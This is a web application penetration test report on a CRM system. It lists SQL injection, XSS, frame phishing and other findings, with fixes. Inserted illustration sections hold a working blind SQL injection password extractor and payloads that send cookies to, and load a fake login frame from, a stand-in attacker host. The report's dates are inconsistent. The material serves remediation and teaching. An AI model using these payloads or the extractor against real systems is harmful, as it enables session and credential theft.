
APPLICATION PENETRATION TESTING REPORT

Scope: CRM

Submitted To: Quatrro

Date: 28th December 2012

CONFIDENTIAL DOCUMENT Not to be circulated or reproduced without appropriate authorization. 1

Document Details

Company: Quatrro
Document Title: Penetration Testing Report
Date: 28-03-2012
Classification: Confidential
Document Type: Report


Table of Contents

Executive Summary ... 3
Goal ... 3
Scope ... 3
Assessment Findings ... 4
Details ... 12
Conclusion ... 22
Recommendation ... 22


Executive Summary

We thank you for choosing Appin Software Security Pvt. Ltd. as your Information Security partner. We appreciate your business and look forward to providing you with our services in the future. The following report presents the results of the application penetration test carried out at your request. In case you have any questions, please contact your Appin representative or email [email protected]

Goal

To provide a comprehensive Penetration Testing Report of the Web Application based on the OWASP Top 10, covering, but not limited to, SQL Injection, CRLF Injection, Directory Traversal, File Inclusion, Buffer Overflow, Cross Site Scripting (XSS) and Cross Site Request Forgery, which will help Quatrro to improve its security level by addressing the vulnerabilities found.

Scope

In-depth Security Assessment of the following Web Application:

Web Application: http://10.100.4.50/testcrm/
Audit Dates: 26th March


Assessment Findings

Ref No. 1: SQL Injection (Risk Level: High)
Vulnerable URLs:
http://10.100.4.50/testcrm/key_view.php?submit1=View&status=0
http://10.100.4.50/testcrm/orderdetail_frame.php?srno=163473
http://10.100.4.50/testcrm/orderinfo.php?orderno=0111111144

Ref No. 2: Cross Site Scripting (Risk Level: High)
Vulnerable URLs:
http://10.100.4.50/testcrm/orderinfo.php?orderno=0111111144
http://10.100.4.50/testcrm/currency_master.php?cid=15
http://10.100.4.50/testcrm/Payment_master.php?pid=11
http://10.100.4.50/testcrm/mail_template.php?mtid=16
http://10.100.4.50/testcrm/subcategory.php?action=edit&catid=1
http://10.100.4.50/testcrm/newproduct.php?srno=558
http://10.100.4.50/testcrm/system.php?action=edit&idsystem=1
http://10.100.4.50/testcrm/component.php?action=edit&idcomponent=1
http://10.100.4.50/testcrm/incident.php?action=edit&idincident=1
http://10.100.4.50/testcrm/module.php?action=edit&idmodule=1
http://10.100.4.50/testcrm/promocode.php?action=edit&id=6
http://10.100.4.50/testcrm/origin_of_cust.php?action=edit&srno=1
http://10.100.4.50/testcrm/sale_medium.php?action=edit&id=1
http://10.100.4.50/testcrm/brand_master.php?action=edit&id=1
http://10.100.4.50/testcrm/disposition_master.php?action=edit&id=1
http://10.100.4.50/testcrm/computer_type.php?action=edit&code=1
http://10.100.4.50/testcrm/operatingsys.php?action=edit&code=2
http://10.100.4.50/testcrm/computer_age.php?action=edit&code=1
http://10.100.4.50/testcrm/internet_con.php?action=edit&code=3
http://10.100.4.50/testcrm/createdfrom.php?action=edit&id=2
http://10.100.4.50/testcrm/subvdnmap_edit.php?account=91011832&vdn=60250
http://10.100.4.50/testcrm/subvdnmap_edit.php?account=91011832
http://10.100.4.50/testcrm/reportschdl.php?action=edit&id=1
http://10.100.4.50/testcrm/matrixmaster.php?eid=3&acc=36321671&plan=200000522&act=1
http://10.100.4.50/testcrm/partnerreportsetting.php?action=edit&id=14
http://10.100.4.50/testcrm/survey_edit.php?surveyid=69C82D9A-0E2E-E011-91D3-001E0BD9CB7C
http://10.100.4.50/testcrm/menu_header.php?action=edit&headerid=1
http://10.100.4.50/testcrm/sub_menu.php?action=edit&idsmenu=1
http://10.100.4.50/testcrm/rolemaster.php?action=edit&iduserrights=1
http://10.100.4.50/testcrm/business_agent.php?id=1
http://10.100.4.50/testcrm/accountdetails.php?account=91011832&action=1&aname=AAA
http://10.100.4.50/testcrm/ibmaster.php?ibid=206
http://10.100.4.50/testcrm/subibmaster.ph?ibid=1
http://10.100.4.50/testcrm/department.php?action=edit&depid=3
http://10.100.4.50/testcrm/employeemaster.php?eid=1

Ref No. 3: Unencrypted Login Request (Risk Level: Medium)
Vulnerable URLs:
http://10.100.4.50/testcrm/login-exec.php

Ref No. 4: Phishing Through Frames (Risk Level: Medium)
Vulnerable URLs:
http://10.100.4.50/testcrm/orderinfo.php?orderno=0111111144
http://10.100.4.50/testcrm/currency_master.php?cid=15
http://10.100.4.50/testcrm/Payment_master.php?pid=11
http://10.100.4.50/testcrm/mail_template.php?mtid=16
http://10.100.4.50/testcrm/subcategory.php?action=edit&catid=1
http://10.100.4.50/testcrm/newproduct.php?srno=558
http://10.100.4.50/testcrm/system.php?action=edit&idsystem=1
http://10.100.4.50/testcrm/component.php?action=edit&idcomponent=1
http://10.100.4.50/testcrm/incident.php?action=edit&idincident=1
http://10.100.4.50/testcrm/module.php?action=edit&idmodule=1
http://10.100.4.50/testcrm/promocode.php?action=edit&id=6
http://10.100.4.50/testcrm/origin_of_cust.php?action=edit&srno=1
http://10.100.4.50/testcrm/sale_medium.php?action=edit&id=1
http://10.100.4.50/testcrm/brand_master.php?action=edit&id=1
http://10.100.4.50/testcrm/disposition_master.php?action=edit&id=1
http://10.100.4.50/testcrm/computer_type.php?action=edit&code=1
http://10.100.4.50/testcrm/operatingsys.php?action=edit&code=2
http://10.100.4.50/testcrm/computer_age.php?action=edit&code=1
http://10.100.4.50/testcrm/internet_con.php?action=edit&code=3
http://10.100.4.50/testcrm/createdfrom.php?action=edit&id=2
http://10.100.4.50/testcrm/subvdnmap_edit.php?account=91011832&vdn=60250
http://10.100.4.50/testcrm/subvdnmap_edit.php?account=91011832
http://10.100.4.50/testcrm/reportschdl.php?action=edit&id=1
http://10.100.4.50/testcrm/matrixmaster.php?eid=3&acc=36321671&plan=200000522&act=1
http://10.100.4.50/testcrm/partnerreportsetting.php?action=edit&id=14
http://10.100.4.50/testcrm/survey_edit.php?surveyid=69C82D9A-0E2E-E011-91D3-001E0BD9CB7C
http://10.100.4.50/testcrm/menu_header.php?action=edit&headerid=1
http://10.100.4.50/testcrm/sub_menu.php?action=edit&idsmenu=1
http://10.100.4.50/testcrm/rolemaster.php?action=edit&iduserrights=1
http://10.100.4.50/testcrm/business_agent.php?id=1
http://10.100.4.50/testcrm/accountdetails.php?account=91011832&action=1&aname=AAA
http://10.100.4.50/testcrm/ibmaster.php?ibid=206
http://10.100.4.50/testcrm/subibmaster.ph?ibid=1
http://10.100.4.50/testcrm/department.php?action=edit&depid=3
http://10.100.4.50/testcrm/employeemaster.php?eid=1

Ref No. 5: Directory Listing Enabled (Risk Level: Low)
Vulnerable URLs:
http://10.100.4.50/testcrm/template
http://10.100.4.50/testcrm/include
http://10.100.4.50/testcrm/images

Details

http://10.100.4.50/testcrm/

Vulnerability: SQL Injection
Risk: High

Potential Security Issue

It is possible to view, modify or delete database entries and tables

Technical Description

A common way to reduce the risk of SQL injection is to suppress detailed SQL error messages, which attackers usually rely on to easily locate scripts that are susceptible to SQL injection. Suppressing the error messages does not remove the vulnerability itself, however.

The concept behind blind SQL injection is that it is possible, even without receiving direct data from the database (in the form of an error message or leaked information), to extract data from the database one bit at a time, or to modify the query in a malicious way. The idea is that the application's behaviour (a result identical to the original result, or a result different from the original result) provides a single bit of information about the evaluated (modified) query. The attacker can therefore formulate an SQL Boolean expression whose evaluation (a single bit) is exposed through the application's behaviour (identical or not identical to the original behaviour), and repeat this for every bit of the data to be extracted.

Fix Recommendations

Several of the issues in this report have a remediation that lies in handling user input safely.

For SQL injection the primary fix is to stop building SQL statements by string concatenation: use parameterised queries (prepared statements with bound parameters) so that user input is always treated as data and never as part of the SQL statement, and run the application's database account with only the privileges it needs, so that a successful injection cannot modify or drop tables. Character filtering, as listed below, is a secondary defence only: blocklists of this kind are routinely bypassed with alternative encodings and they break legitimate input such as apostrophes in customer names.

By verifying that user input does not contain hazardous characters, it is possible to prevent malicious users from causing your application to execute unintended operations, such as launching arbitrary SQL queries, embedding JavaScript code to be executed on the client side, running various operating system commands etc.

It is advised to filter out all of the following characters:

[1] | (pipe sign)
[2] & (ampersand sign)
[3] ; (semicolon sign)
[4] $ (dollar sign)
[5] % (percent sign)
[6] @ (at sign)
[7] ' (single apostrophe)
[8] " (quotation mark)
[9] \' (backslash-escaped apostrophe)
[10] \" (backslash-escaped quotation mark)
[11] <> (triangular parenthesis)
[12] () (parenthesis)
[13] + (plus sign)
[14] CR (Carriage return, ASCII 0x0d)
[15] LF (Line feed, ASCII 0x0a)
[16] , (comma sign)
[17] \ (backslash)
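The following Python script is an added illustration of the blind-injection technique described above and of the parameterised-query fix; it is not code from this report or from the CRM application. An in-memory SQLite database with constructed rows stands in for the CRM's database, and a function modelled on orderinfo.php?orderno= concatenates the parameter into its query with error messages suppressed, so that only the found/not-found behaviour is visible. The table and column names (orders, users, password) and the seeded values are assumptions.

```python
import sqlite3

# Constructed sample data standing in for the CRM's order and user tables.
# Table names, column names and values are assumptions, not Quatrro data.
ORDERS = [
    ("0111111144", "Customer A", "closed"),
    ("0111111145", "Customer B", "open"),
]
USERS = [("admin", "s3cr3t")]


def make_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (orderno TEXT, customer TEXT, status TEXT)")
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?)", ORDERS)
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def orderinfo_vulnerable(conn, orderno):
    """Mimics orderinfo.php?orderno=...: the parameter is concatenated into the SQL.
    Database errors are suppressed, so only found/not-found behaviour leaks."""
    sql = "SELECT customer, status FROM orders WHERE orderno = '" + orderno + "'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "Order not found"
    return "Order found" if row else "Order not found"


def orderinfo_fixed(conn, orderno):
    """The same lookup with a parameterised query: the input is bound as data."""
    row = conn.execute(
        "SELECT customer, status FROM orders WHERE orderno = ?", (orderno,)
    ).fetchone()
    return "Order found" if row else "Order not found"


def oracle(conn, handler, condition):
    """One bit: does the page still say 'found' when CONDITION is ANDed into the query?"""
    payload = "0111111144' AND (" + condition + ") AND '1'='1"
    return handler(conn, payload) == "Order found"


def blind_extract(conn, handler, column, table, max_len=32):
    """Recover one value of TABLE.COLUMN using only the boolean page behaviour."""
    length = 0
    for n in range(1, max_len + 1):   # first recover the length of the value
        if oracle(conn, handler, f"(SELECT length({column}) FROM {table} LIMIT 1) = {n}"):
            length = n
            break
    chars = []
    for pos in range(1, length + 1):  # then each character, one bit at a time
        code = 0
        for bit in range(7):          # 7 bits are enough for ASCII
            cond = (f"(SELECT (unicode(substr({column}, {pos}, 1)) >> {bit}) & 1 "
                    f"FROM {table} LIMIT 1) = 1")
            if oracle(conn, handler, cond):
                code |= 1 << bit
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks:", repr(blind_extract(db, orderinfo_vulnerable, "password", "users")))
    print("fixed handler leaks:     ", repr(blind_extract(db, orderinfo_fixed, "password", "users")))
```

Against the concatenating handler the loop recovers the seeded password with roughly seven requests per character even though no error text or data is ever returned; against the parameterised handler every payload is compared literally with the orderno column, the oracle never fires and nothing is recovered.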


http://10.100.4.50/testcrm/

Vulnerability: Cross Site Scripting
Risk: High

Potential Security Issue

It is possible to steal or manipulate customer session and cookies, which might be used to

impersonate a legitimate user, allowing the hacker to view or alter user records, and to

perform transactions as that user.

Technical Description

Cross-Site Scripting is a privacy violation that allows an attacker to acquire a legitimate user's credentials and to impersonate that user when interacting with a specific website.

The attack hinges on the fact that the web site contains a script that returns a user's input

(usually a parameter value) in an HTML page, without first sanitizing the input. This allows an

input consisting of JavaScript code to be executed by the browser when the script returns this

input in the response page. As a result, it is possible to form links to the site where one of the

parameters consists of malicious JavaScript code. This code will be executed (by a user's

browser) in the site context, granting it access to cookies that the user has for the site, and other

windows in the site through the user's browser.

Possible actions that can be performed by the script are:

[1] Send user's cookies (for the legitimate site) to the attacker.

[2] Send information that is accessible through the DOM (URLs, Form fields, etc.), to the

attacker.

The result is that the security and privacy of the victim user is compromised on the vulnerable

site.

Fix Recommendations

Encode user input at the point where it is written into the HTML response, using HTML entity encoding for element content and attribute values (and JavaScript or URL encoding where the value lands inside a script or a URL), and filter out JavaScript code. Encoding keeps the data intact while making it inert in the browser, whereas filtering characters alone is both bypassable and destructive to legitimate input. We suggest you filter the following characters:

[1] <> (triangular parenthesis)
[2] " (quotation mark)
[3] ' (single apostrophe)
[4] % (percent sign)
[5] ; (semicolon)
[6] () (parenthesis)
[7] & (ampersand sign)
[8] + (plus sign)


http://10.100.4.50/testcrm/

Vulnerability: Unencrypted Login Request
Risk: Medium

Potential Security Issue

It may be possible to steal user login information such as usernames and passwords that are

sent unencrypted.

Technical Description

During the application test, it was detected that an unencrypted login request was sent to the server. Since some of the input fields used in the login process (for example usernames and passwords) are personal and sensitive, they should be sent to the server over an encrypted connection.

Fix Recommendations

Make sure that all login requests are sent to the server over an encrypted connection (HTTPS/TLS). Serve the login form itself over HTTPS as well, since a form delivered over plain HTTP can be altered in transit to post the credentials elsewhere; redirect plain HTTP requests for the application to HTTPS; and set the Secure flag on the session cookie issued after login, otherwise the authenticated session can still be captured on the network even when the password itself was protected.


http://10.100.4.50/testcrm/

Vulnerability: Phishing Through Frames
Risk: Medium

Potential Security Issue

It is possible to persuade a naive user to supply sensitive information such as username,

password, credit card number etc.

Technical Description

It is possible for an attacker to inject a frame or an iframe tag with malicious content which

resembles the attacked site. An incautious user may browse it and not realize that he is leaving

the original site and surfing to a malicious site. The attacker may then lure the user to login

again, thus acquiring his login credentials.

The fact that the fake site is embedded in the original site helps the attacker by giving his

phishing attempts a more reliable appearance.

Fix Recommendations

The injection point is the same as in finding 2 (Cross Site Scripting): a parameter value is written into the page without encoding, so the attacker can place a <frame> or <iframe> tag in it. HTML-entity encoding the value at the point of output removes the problem; as an additional safeguard, a Content-Security-Policy header whose frame-src directive lists only trusted origins stops an injected frame from loading attacker-controlled content. It is also advised to filter out all of the following characters:

[1] | (pipe sign)
[2] & (ampersand sign)
[3] ; (semicolon sign)
[4] $ (dollar sign)
[5] % (percent sign)
[6] @ (at sign)
[7] ' (single apostrophe)
[8] " (quotation mark)
[9] \' (backslash-escaped apostrophe)
[10] \" (backslash-escaped quotation mark)
[11] <> (triangular parenthesis)
[12] () (parenthesis)
[13] + (plus sign)
[14] CR (Carriage return, ASCII 0x0d)
[15] LF (Line feed, ASCII 0x0a)
[16] , (comma sign)
[17] \ (backslash)
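The following Python script is an added illustration covering both finding 2 (Cross Site Scripting) and finding 4 (Phishing Through Frames), since both arise from the same unencoded reflection; it is not code from this report or from the CRM application. It models a page that writes a request parameter (named aname here, after accountdetails.php?...&aname=AAA) into an input field, renders it both unencoded and HTML-entity encoded, parses the result the way a browser would to see which tags get created, and contrasts output encoding with the character blocklist recommended above. The page markup, the attacker.example host and the payloads are constructed assumptions.

```python
import html
from html.parser import HTMLParser


# Constructed page fragment: a request parameter is reflected into an attribute.
def render_vulnerable(aname):
    """Reflects the parameter verbatim, as the vulnerable CRM pages do."""
    return '<input type="text" name="aname" value="' + aname + '">'


def render_fixed(aname):
    """HTML-entity encodes the parameter at the point of output (the real fix)."""
    return '<input type="text" name="aname" value="' + html.escape(aname, quote=True) + '">'


# The report's blocklist approach, for comparison: strip the listed characters.
BLOCKLIST = set('<>"\'%;()&+')


def filter_blocklist(value):
    return "".join(ch for ch in value if ch not in BLOCKLIST)


# Constructed attack inputs: a script that sends the cookie to the attacker, and an
# injected frame that loads a look-alike login page (the Phishing Through Frames case).
PAYLOADS = {
    "xss": '"><script>new Image().src="http://attacker.example/?c="+document.cookie</script>',
    "frame": '"><iframe src="http://attacker.example/login.html" width="100%" height="600"></iframe>',
}


class _Collector(HTMLParser):
    """Records every start tag and the value attribute of each input element."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.values.append(dict(attrs).get("value"))


def _parse(response):
    p = _Collector()
    p.feed(response)
    p.close()
    return p


def injected_tags(response):
    """Detection check: active tags a browser would create from the response."""
    return [t for t in _parse(response).tags if t in ("script", "iframe", "frame")]


def reflected_value(response):
    """The value a browser would show in the input field (entities decoded)."""
    return _parse(response).values[0]


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(name, "vulnerable ->", injected_tags(render_vulnerable(payload)))
        print(name, "fixed      ->", injected_tags(render_fixed(payload)))
    print("encoding keeps the data: ", reflected_value(render_fixed("O'Brien & Sons")))
    print("blocklist destroys data: ", filter_blocklist("O'Brien & Sons"))
```

With the unencoded page the browser creates a script element from the first payload and an iframe from the second; with the encoded page both payloads remain plain text inside the attribute, and the same encoding leaves a legitimate value such as a customer name with an apostrophe and an ampersand intact, whereas the blocklist silently mangles it.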


http://10.100.4.50/testcrm/

Vulnerability: Directory Listing Enabled
Risk: Low

Potential Security Issue

It is possible to view and download the contents of certain web application virtual directories,

which might contain restricted files.

Technical Description

If the web server was configured improperly, it is possible to retrieve a directory listing by

sending a request for a specific directory, rather than for a file.

Fix Recommendations

[1] Configure the web server to deny listing of directories (on Apache, Options -Indexes in the server configuration or in an .htaccess file for the affected directories; on nginx, autoindex off).
[2] Apply the relevant security patch or configuration fix for the issue that exists on your web server or web application. Directories such as include and template hold server-side code and templates that are not meant to be requested directly, so they should additionally be placed outside the web root or blocked by server configuration.


Conclusion

On the basis of the penetration testing carried out on your web application, it can be concluded that the web application does contain vulnerabilities: two rated High (SQL Injection and Cross Site Scripting), two rated Medium (Unencrypted Login Request and Phishing Through Frames) and one rated Low (Directory Listing Enabled).

Recommendation

High and Medium level vulnerabilities should be fixed on priority, and the application should be re-tested after remediation to confirm that the fixes are effective.

